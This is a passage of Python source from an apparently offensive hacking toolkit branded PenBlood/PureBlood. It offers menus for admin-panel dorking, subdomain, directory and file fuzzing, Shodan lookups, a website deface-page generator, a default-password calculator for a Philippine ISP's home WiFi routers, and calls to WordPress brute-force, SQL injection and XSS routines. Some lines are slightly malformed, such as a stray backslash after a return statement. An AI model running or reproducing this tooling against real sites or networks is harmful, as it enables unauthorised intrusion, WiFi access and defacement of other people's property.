webbrowser.open_new_tab(google_hacking + 'site:' + ads_url + '+inurl:login | admin | user | cpanel | account | moderator | phpmyadmin | /cp')
self.admin_panel_scan_result = admin_panel_valid
return self.admin_panel_scan_result
def subdomain_scan(self, ss_hostname, subdomain_list):
so_200 = []
so_301 = []
so_302 = []
so_403 = []
ss_urls = []
ss_subdomain_list = open(subdomain_list, 'r')
ss_subdomain_list = ss_subdomain_list.read().splitlines()
for i in ss_subdomain_list:
ss_urls.append(i + '.' + ss_hostname)
for i in ss_urls:
t = threading.Thread(target=subdomain_scanner, args=(i, so_200, so_301, so_302, so_403,))
t.start()
t.join()
self.ss_200_result = so_200
self.ss_301_result = so_301
self.ss_302_result = so_302
self.ss_403_result = so_403
return self.ss_200_result, self.ss_301_result, self.ss_302_result, self.ss_403_result
def cms_detect(self, cd_hostname):
cd_cms = []
cd_cms_version = []
cms_detect_request = requests.get('https://whatcms.org/?s=' + cd_hostname)
cd_soup = BeautifulSoup(cms_detect_request.content, 'html.parser')
cd_soup_div = cd_soup.find('div', attrs={'class': 'large text-center'})
for i in cd_soup_div.find_all('span', attrs={'class': 'nowrap'}):
cd_cms_version.append(i.text)
cd_cms.append(cd_soup_div.find('a').text)
if not cd_cms:
cms_detect_final = '[!] - There\'s no CMS Detected!'
else:
cd_cms_version = cd_cms_version[1]
cms_detect_final = cd_cms[0].replace('/c/', '')
cms_detect_final = cms_detect_final + ' - ' + cd_cms_version
self.cms_detect_result = cms_detect_final
return self.cms_detect_result
def reverse_ip_lookup(self, ril_hostname):
reverse_ip_lookup_request = requests.get('https://api.hackertarget.com/reverseiplookup/?q=' + ril_hostname)
reverse_ip_lookup_response = reverse_ip_lookup_request.text
reverse_ip_lookup_final = """{0}""".format(str(reverse_ip_lookup_response))
self.reverse_ip_lookup_result = reverse_ip_lookup_final
return self.reverse_ip_lookup_result
def subnet_lookup(self, subnet_input):
subnet_lookup_request = requests.get('https://api.hackertarget.com/subnetcalc/?q=' + subnet_input)
subnet_lookup_response = subnet_lookup_request.text
subnet_lookup_final = """{0}""".format(str(subnet_lookup_response))
self.subnet_lookup_result = subnet_lookup_final
return self.subnet_lookup_result
def links_extract(self, le_url):
links_extract_request = requests.get('https://api.hackertarget.com/pagelinks/?q=' + le_url)
links_extract_response = links_extract_request.text
links_extract_final = """{0}""".format(str(links_extract_response))
self.links_extract_result = links_extract_final
return self.links_extract_result
def directory_fuzz(self, df_url, directory_list):
directory_fuzz_final1 = []
directory_fuzz_final2 = []
directory_fuzz_final3 = []
directory_list_open = open(directory_list, 'r')
directory_list = directory_list_open.read().splitlines()
df_url_list = []
ii = 0
for i in directory_list:
if '/' in directory_list[ii]:
df_url_list.append(df_url + i)
else:
df_url_list.append(df_url + '/' + i)
ii = ii + 1
for i in df_url_list:
print (i)
t = threading.Thread(target=directory_scanner, args=(i, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3))
t.start()
t.join()
self.directory_fuzz_result1 = directory_fuzz_final1
self.directory_fuzz_result2 = directory_fuzz_final2
self.directory_fuzz_result3 = directory_fuzz_final3
return self.directory_fuzz_result1, self.directory_fuzz_result2, self.directory_fuzz_result3\
def file_fuzz(self, ff_url, file_list):
file_fuzz_final1 = []
file_fuzz_final2 = []
file_fuzz_final3 = []
file_list_open = open(file_list, 'r')
file_list = file_list_open.read().splitlines()
ff_url_list = []
for i in file_list:
ff_url_list.append(ff_url + '/' + i)
for i in ff_url_list:
t = threading.Thread(target=file_scanner, args=(i, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3))
t.start()
t.join()
self.file_fuzz_result1 = file_fuzz_final1
self.file_fuzz_result2 = file_fuzz_final2
self.file_fuzz_result3 = file_fuzz_final3
return self.file_fuzz_result1, self.file_fuzz_result2, self.file_fuzz_result3
def shodan_search(self, query, ss_SHODAN_API_KEY):
shodan_api = shodan.Shodan(ss_SHODAN_API_KEY)
try:
shodan_search_results = shodan_api.search(query)
self.shodan_search_result = shodan_search_results
return self.shodan_search_result
except shodan.APIError as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
web_pentest()
def shodan_host_lookup(self, shodan_host, shl_SHODAN_API_KEY):
shodan_api = shodan.Shodan(shl_SHODAN_API_KEY)
try:
shodan_host_lookup_results = shodan_api.host(shodan_host)
self.shodan_host_lookup_result = shodan_host_lookup_results
return self.shodan_host_lookup_result
except shodan.APIError as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
web_pentest()
def create_directories():
if not os.path.exists('outputs'):
os.mkdir('outputs')
else:
pass
if not os.path.exists('outputs/generator'):
os.mkdir('outputs/generator')
else:
pass
if not os.path.exists('outputs/web_pentest'):
os.mkdir('outputs/web_pentest')
else:
pass
if not os.path.exists('outputs/web_pentest/shodan'):
os.mkdir('outputs/web_pentest/shodan')
else:
pass
if not os.path.exists('outputs/web_application_attack'):
os.mkdir('outputs/web_application_attack')
else:
pass
if not os.path.exists('external'):
os.mkdir('external')
else:
pass
def clear():
if platform.system() == 'Linux':
os.system('clear')
elif platform.system() == 'Windows':
os.system('cls')
elif platform.system() == 'Darwin':
os.system('clear')
else:
os.system('clear')
def banner():
try:
if sys.version_info[0] == 3:
banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
{2}--={3}[ {0}{5}Author: LinterexEvilCommunity {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/LinterexEvilCommunity {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PenHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold))
elif sys.version_info[0] == 2:
banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
{2}--={3}[ {0}{5}Author: LinterexEvilCommunity {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/LinterexEvilCommunity{3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}penHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
print (banner)
except:
if sys.version_info[0] == 3:
banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o
{2}--={3}[ {0}{5}Author: LinterexEvilCommunity {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/LinterexEvilCommunity {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PenHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold))
elif sys.version_info[0] == 2:
banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o
{2}--={3}[ {0}{5}Author: LinterexEvilCommunity {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/LinterexEvilCommunity {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PenHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
print (banner)
def set_target(target, wfunc):
global url
global hostname
global ip
if '=' in target and wfunc != 2:
target = urlparse(target)
if target.scheme == '':
target = ('{0}'.format(target.netloc))
else:
target = ('{0}://{1}'.format(target.scheme, target.netloc))
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
if '1' == target[0] or '2' == target[0] or '3' == target[0] or '4' == target[0] or '5' == target[0] or '6' == target[0] or '7' == target[0] or '8' == target[0] or '9' == target[0]:
ip = target
if wfunc == 2:
pass
else:
ip = socket.gethostbyname(hostname)
if wfunc == 1:
web_pentest()
elif wfunc == 2:
web_application_attack()
else:
main()
def generator():
print ("""{3}[ {5}Generator {3}]
{2}01{3}) {5}Deface Page Generator
{2}02{3}) {5}Password Generator
{2}03{3}) {5}PLDT WiFi Password Calculator
{2}04{3}) {5}Text To Hash
{2}90{3}) {5}Back To Menu
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PenBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PenBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
cgenerator = Generator()
if choice == 1:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
if sys.version_info[0] == 3:
title = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
shortcut_icon = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
meta_description = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
meta_image = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
logo = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
hacker_name = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
message1 = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
message2 = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
groups = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
deface_page_output_filename = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
title = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
shortcut_icon = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
meta_description = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
meta_image = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
logo = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
hacker_name = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
message1 = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
message2 = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
groups = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
deface_page_output_filename = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
gdeface_page = cgenerator.deface_page(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups)
if '.html' in deface_page_output_filename:
deface_page_output_filename = deface_page_output_filename
else:
deface_page_output_filename = deface_page_output_filename + '.html'
deface_page_output_file = open('outputs/generator/' + deface_page_output_filename, 'w+')
deface_page_output_file.write(gdeface_page)
deface_page_output_file.close()
print ('\nOutput saved in outputs/generator/' + deface_page_output_filename + '{0}')
print (reset + bold)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 2:
if sys.version_info[0] == 3:
length = int(input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
text = str(input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
length = int(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
text = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
gpassword_generator1, gpassword_generator2, gpassword_generator3 = cgenerator.password_generator(length, text)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('Random Password: ' + gpassword_generator1)
print ('MD5: ' + gpassword_generator2)
print ('L33T: ' + gpassword_generator3)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 3:
if sys.version_info[0] == 3:
print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
digit5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
mac5 = str(input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
digit5 = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
mac5 = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
gpldt_password_calculator1, gpldt_password_calculator2, gpldt_password_calculator3, gpldt_password_calculator4, gpldt_password_calculator5 = cgenerator.pldt_password_calculator(digit5, mac5)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('[#] - Possible Password of the PLDT WIFI:')
print ('\nFOR : PLDTHOMEDSL, PLDTmyDSLPAL, and PLDTmyDSLBiz')
for i in gpldt_password_calculator1:
print (' > ' + i)
print ('\nFOR : PLDTHOMEDSLxxxxx')
for i in gpldt_password_calculator2:
print (' > ' + i)
print ('\nFOR : PLDTHOMEFIBR_xxxxxx')
print (' > ' + gpldt_password_calculator3)
print ('\nFOR : PLDTHOMEFIBRxxxxxx')
for i in gpldt_password_calculator4:
print (' > ' + i)
print ('\nFOR : HomeBro_Ultera')
print (' > ' + gpldt_password_calculator5)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 4:
if sys.version_info[0] == 3:
text = str(input('{0}PenBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
text = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
gtext_to_hash = cgenerator.text_to_hash(text)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print (gtext_to_hash)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 90:
main()
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
def web_application_attack():
global cweb_application_atttack
print ("""{3}[ {5}Web Application Attack {3}]
{2}01{3}) {5}Wordpress
{2}02{3}) {5}SQL Injection
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PenBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PenBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
cweb_application_atttack = WebApplicationAttack()
if choice == 1:
print ("""{3}[ {5}Web Application Attack {3}]
{2}01{3}) {5}WPScan (Kali Linux) - Install manually on other OS
{2}02{3}) {5}WPScan Bruteforce (Kali Linux) - Install manually on other OS
{2}03{3}) {5}Wordpress Plugins Vulnerability Checker
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice1 = int(input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif sys.version_info[0] == 2:
try:
choice1 = int(raw_input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
if choice1 == 1:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wp_scan = cweb_application_atttack.wp_scan(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
web_application_attack()
elif choice1 == 2:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wp_scan_bruteforce = cweb_application_atttack.wp_scan_bruteforce(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice1 == 3: # Exploit-DB.com
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wordpress_plugin_checker = cweb_application_atttack.wordpress_vulnerability_check(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice1 == 90:
main()
elif choice1 == 95:
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
set_target(target, 2)
elif choice1 == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif choice == 2:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_auto_sql_injection = cweb_application_atttack.auto_sql_injection(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
print ('')
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice == 3:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_auto_xss_injection = cweb_application_atttack.wap_auto_xss_injection(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
print ('')
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice == 90:
main()
elif choice == 95:
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
print ('')
set_target(target, 2)
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
def web_pentest():
global web_pentest_output
global web_pentest_outputfile
print ("""{3}[ {5}Web Pentest {3}]
{2}01{3}) {5}Banner Grab
{2}02{3}) {5}Whois
{2}03{3}) {5}Traceroute
{2}04{3}) {5}DNS Record
{2}05{3}) {5}Reverse DNS Lookup
{2}06{3}) {5}Zone Transfer Lookup
{2}07{3}) {5}Port Scan
{2}08{3}) {5}Admin Panel Scan
{2}09{3}) {5}Subdomain Scan
{2}10{3}) {5}CMS Identify
{2}11{3}) {5}Reverse IP Lookup
{2}12{3}) {5}Subnet Lookup
{2}13{3}) {5}Extract Page Links
{2}14{3}) {5}Directory Fuzz
{2}15{3}) {5}File Fuzz
{2}16{3}) {5}Shodan Search
{2}17{3}) {5}Shodan Host Lookup
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PenBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PenBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
cweb_pentest = WebPentest()
if choice == 1:
try:
wp_banner_grab = cweb_pentest.banner_grab(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Banner Grab Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_banner_grab)
web_pentest_outputfile.write('\n' + wp_banner_grab)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 2:
try:
wp_whois = cweb_pentest.whois(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
